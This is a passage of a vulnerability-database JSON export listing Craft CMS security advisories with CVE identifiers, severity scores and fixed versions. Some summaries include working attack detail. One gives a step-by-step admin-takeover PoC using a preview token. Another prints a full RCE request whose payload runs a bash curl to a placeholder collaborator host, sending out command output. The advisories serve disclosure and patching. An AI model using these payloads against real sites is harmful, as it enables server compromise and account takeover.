ty":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jsfs-azcs-mfcm"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qq68-3j4y-47am"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-r5hp-5nju-9ubz"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.4.3"}],"aliases":["CVE-2024-52293","GHSA-f3cw-hg6r-chfv"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-71sv-62m4-z3er"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49581?format=json","vulnerability_id":"VCID-7y4f-ef7t-47eb","summary":"Craft CMS vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior\nThis was reported as a vulnerability in Yii framework on August 7th (https://github.com/yiisoft/yii2/security/advisories/GHSA-gcmh-9pjj-7fp4). The Yii framework team denies responsibility for this (placing the onus on application developers) and hence has not (and seemingly will not) provide a fix at the framework level. 
Hence, I am reporting this to Craft as I found it to affect the latest (`5.6.0`) version of Craft CMS.\n\nLeveraging a legitimate but maliciously crafted Yii `Behavior` class, it’s possible to trigger Remote Code Execution (RCE) via Reflection when the tainted `Behavior` is attached to a Yii `Component`, and an event is also fired on the tainted `Component`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68455","reference_id":"","reference_type":"","scores":[{"value":"0.0114","scoring_system":"epss","scoring_elements":"0.78777","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68455"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-01-06T14:26:28Z/"}],"url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04"},{"reference_url":"https://github.com/craftcms/cms/commit/27f55886098b56c00ddc53b69239c9c9192252c7","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R
/2026-01-06T14:26:28Z/"}],"url":"https://github.com/craftcms/cms/commit/27f55886098b56c00ddc53b69239c9c9192252c7"},{"reference_url":"https://github.com/craftcms/cms/commit/6e608a1a5bfb36943f94f584b7548ca542a86fef","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-01-06T14:26:28Z/"}],"url":"https://github.com/craftcms/cms/commit/6e608a1a5bfb36943f94f584b7548ca542a86fef"},{"reference_url":"https://github.com/craftcms/cms/commit/ec43c497edde0b2bf2e39a119cded2e55f9fe593","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-01-06T14:26:28Z/"}],"url":"https://github.com/craftcms/cms/commit/ec43c497edde0b2bf2e39a119cded2e55f9fe593"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68455","reference_id":"CVE-2025-68455","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68455"},{"reference_url":"https://github.com/advisories/GHSA-255j-qw47-wjh5","reference_id":"GHSA-255j-qw47-wjh5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-255j-qw47-wjh5"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5","reference_id":"GHSA-2
55j-qw47-wjh5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-01-06T14:26:28Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73169?format=json","purl":"pkg:composer/craftcms/cms@5.8.21","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability
":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.21"}],"aliases":["CVE-2025-68455","GHSA-255j-qw47-wjh5"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7y4f-ef7t-47eb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90802?format=json","vulnerability_id":"VCID-83rt-3tyj-qbgx","summary":"Craft CMS Vulnerable to Privilege Escalation/Bypass through UsersController->actionImpersonateWithToken()\n### Summary\nA low-privilege user (or an unauthenticated user who has been sent a shared URL) can escalate their privileges to admin by abusing `UsersController->actionImpersonateWithToken`.\n\nAffected users should update to Craft 4.17.6 and 5.9.12 to mitigate the issue.\n\n### Details\nThis vulnerability allows any low-privilege user to escalate their privileges and become an admin, or, in extreme circumstances, unprivileged users to do the same.\n\nTherefore, this vulnerability affects Craft Pro and Team more than Craft Solo.\n\nSpecifically, an attacker who possesses a valid “preview token” can then append `&action=users/impersonate-with-token&userId=1&prevUserId=1` to the preview URL to hijack the request into the impersonation endpoint, logging in as any user (including admin) without authentication. Getting the preview token is easy, and all an editor would have to do is create a single article, click “Preview”, and then recover this token.\n\nHere’s what happens:\n\n1. 
The action re-dispatch in `actionPreview()` passes `$skipSpecialHandling=true` to `handleRequest()`, bypassing all security guards, and passes `$checkToken=false` to `checkIfActionRequest()`, which allows an attacker-controlled action query parameter to override the dispatch target.\n2. The `requireToken()` guard on `actionImpersonateWithToken()` only checks a boolean (`_hadToken`) that was set when the preview token was initially resolved. It does not verify that the token was intended for the impersonation action, and so any valid token from any route satisfies the check.\n3. `actionImpersonateWithToken` is listed in `$allowAnonymous` and performs no authorization beyond `requireToken()`, so no prior authentication is required.\n\n### PoC\n\nThe PoC achieves full admin takeover on the latest Craft CMS 5.9.10. Spawn a local version of Craft. Then, you’ll want to log in and create a valid setup:\n\n1. Log in at http://host:18895/admin\n2. Go to Settings,  Sections, New Section (name: \"Blog\", type: \"Channel\")\n3. Under Site Settings, set URI Format to blog/{slug}\n4. Then go to Entries, New Entry, Blog, and give it any title\n\nNext, obtain a preview token\n\n1. Open the saved entry in the editor\n2. Click the Preview button\n3. A preview pane opens with the entry rendered in an iframe\n4. Right-click inside the preview pane and Inspect Element\n5. Find the <iframe> element; its src contains the tokenized URL: `http://host:18895/blog/title?x-craft-live-preview=...&token=XXXXXXXX`\n6. Copy the `token=` value\n\nFinally, execute the exploit:\n\n  1. Open a new incognito/private browser window\n  2. Navigate to: `http://host:18895/?token=XXXXXXXX&action=users/impersonate-with-token&userId=1&prevUserId=1`\n  3. You may see a 404.  This is expected.\n\nTo verify the exploit, in the same incognito tab, navigate to `http://host:18895/admin`. 
You should land on the admin dashboard, logged in as admin, without ever entering credentials.\n\n### Impact\n\nPrivilege escalation; everyone is impacted.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32267","reference_id":"","reference_type":"","scores":[{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14681","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32267"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/6301e217c5f15617d939c432cb770db50af14b33","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-18T15:43:19Z/"}],"url":"https://github.com/craftcms/cms/commit/6301e217c5f15617d939c432cb770db50af14b33"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-cc7p-2j3x-x7xf","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-18T15:43:19Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-cc7p-2j3x-x7xf"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32267","reference_id":"","ref
erence_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32267"},{"reference_url":"https://github.com/advisories/GHSA-cc7p-2j3x-x7xf","reference_id":"GHSA-cc7p-2j3x-x7xf","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-cc7p-2j3x-x7xf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112606?format=json","purl":"pkg:composer/craftcms/cms@5.9.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.12"}],"aliases":["CVE-2026-32267","GHSA-cc7p-2j3x-x7xf"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-83rt-3tyj-qbgx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50542?format=json","vulnerability_id":"VCID-8u2j-17a4-q7eh","summary":"Craft CMS Vulnerable to Authenticated RCE via \"craft.app.fs.write()\" in Twig Templates\nAn authenticated administrator can achieve Remote Code Execution (RCE) by injecting a Server-Side Template Injection (SSTI) payload into Twig template fields (e.g., Email Templates). 
By calling the `craft.app.fs.write()` method, an attacker can write a malicious PHP script to a web-accessible directory and subsequently access it via the browser to execute arbitrary system commands.\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28697","reference_id":"","reference_type":"","scores":[{"value":"0.00208","scoring_system":"epss","scoring_elements":"0.43271","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28697"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/9dc2a4a3ec8e9cd5e8c0d1129f36371437519197","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-04T18:02:12Z/"}],"url":"https://github.com/craftcms/cms/commit/9dc2a4a3ec8e9cd5e8c0d1129f36371437519197"},{"reference_url":"https://github.com/craftcms/cms/pull/18216","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-04T18:02:12Z/"}],"url":"https://github.com/craftcms/cms/pull/18216"},{"reference_url":"https://github.com/craftcms/cms/pull/18219","reference_id":"","r
eference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-04T18:02:12Z/"}],"url":"https://github.com/craftcms/cms/pull/18219"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28697","reference_id":"CVE-2026-28697","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28697"},{"reference_url":"https://github.com/advisories/GHSA-v47q-jxvr-p68x","reference_id":"GHSA-v47q-jxvr-p68x","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v47q-jxvr-p68x"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-v47q-jxvr-p68x","reference_id":"GHSA-v47q-jxvr-p68x","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-04T18:02:12Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-v47q-jxvr-p68x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"V
CID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["CVE-2026-28697","GHSA-v47q-jxvr-p68x"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8u2j-17a4-q7eh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/95139?format=json","vulnerability_id":"VCID-9ca4-tbhq-27ad","summary":"Craft CMS has Potential Authenticated Remote Code Execution via Malicious Attached Behavior\nWe identified a vulnerability in the latest version of Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server.  
Yii’s dynamic object configuration, as implemented in Craft CMS, is a feature that lets the application build parts of itself from a settings list.\n\nThis is largely a continuation of https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5, but through a different path that was not mitigated in the original.\n\nThe request-controlled condition field layouts data is converted into a live FieldLayout object without a `Component::cleanseConfig()` boundary. Because Craft configures models before `parent::__construct()`, attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event.\n\nThis appears to be another variant of the recent object-config / behavior-injection bug family, but via the condition / field layout hydration path.\n\nWe were able to reproduce the attack by issuing a POST request to `/admin/actions/element-search/search` with the following JSON from any connected user. Other routes can be exploited in the same way, including the rest of the element-indexes actions that pass through that same `beforeAction()` path. 
This results in a curl request to the chosen server with the result of the command “id” for the web user being appended to the path:\n\n ```\nPOST /admin/actions/element-search/search HTTP/2\nHost: hostnamehere\nCookie: CraftSessionId=...; 1234123412341234_identity=...; CRAFT_CSRF_TOKEN=...;\nContent-Length: …\nUser-Agent: Mozilla/5.0\nX-Csrf-Token: ...\nAccept: application/json\nContent-Type: application/json\n\n{\n\n  \"elementType\": \"craft\\\\elements\\\\Category\",\n  \"siteId\": 1,\n  \"search\": \"\",\n  \"condition\": {\n    \"class\": \"craft\\\\elements\\\\conditions\\\\ElementCondition\",\n    \"elementType\": \"craft\\\\elements\\\\Category\",\n    \"fieldLayouts\": [\n      {\n        \"as rce\": {\n          \"__class\": \"yii\\\\behaviors\\\\AttributeTypecastBehavior\",\n          \"__construct()\": [\n            {\n              \"attributeTypes\": {\n                \"typecastBeforeSave\": [\n                  \"Psy\\\\Readline\\\\Hoa\\\\ConsoleProcessus\",\n                  \"execute\"\n                ]\n              },\n              \"typecastBeforeSave\": \"/bin/bash -c \\\"curl [https://yourcollaboratorservergoeshere/`id`\\](https://yourcollaboratorservergoeshere/%60id%60/)\"\"\n            }\n          ]\n        },\n        \"on *\": \"self::beforeSave\"\n      }\n    ]\n  }\n}\n```\n\n## 
Resources\n\nhttps://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44011","reference_id":"","reference_type":"","scores":[{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06383","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44011"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-13T15:01:05Z/"}],"url":"https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-13T15:01:05Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44011","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvss
v4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44011"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5","reference_id":"GHSA-255j-qw47-wjh5","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5"},{"reference_url":"https://github.com/advisories/GHSA-qrgm-p9w5-rrfw","reference_id":"GHSA-qrgm-p9w5-rrfw","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-qrgm-p9w5-rrfw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/118776?format=json","purl":"pkg:composer/craftcms/cms@5.9.18","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.18"}],"aliases":["CVE-2026-44011","GHSA-qrgm-p9w5-rrfw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9ca4-tbhq-27ad"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50068?format=json","vulnerability_id":"VCID-9enr-b6zd-mbh8","summary":"Craft CMS Vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior\nA Remote Code Execution (RCE) vulnerability exists in Craft CMS where the `assembleLayoutFromPost()` function in `src/services/Fields.php` fails to sanitize user-supplied configuration data before passing it to `Craft::createObject()`. This allows authenticated administrators to inject malicious Yii2 behavior configurations that execute arbitrary system commands on the server. 
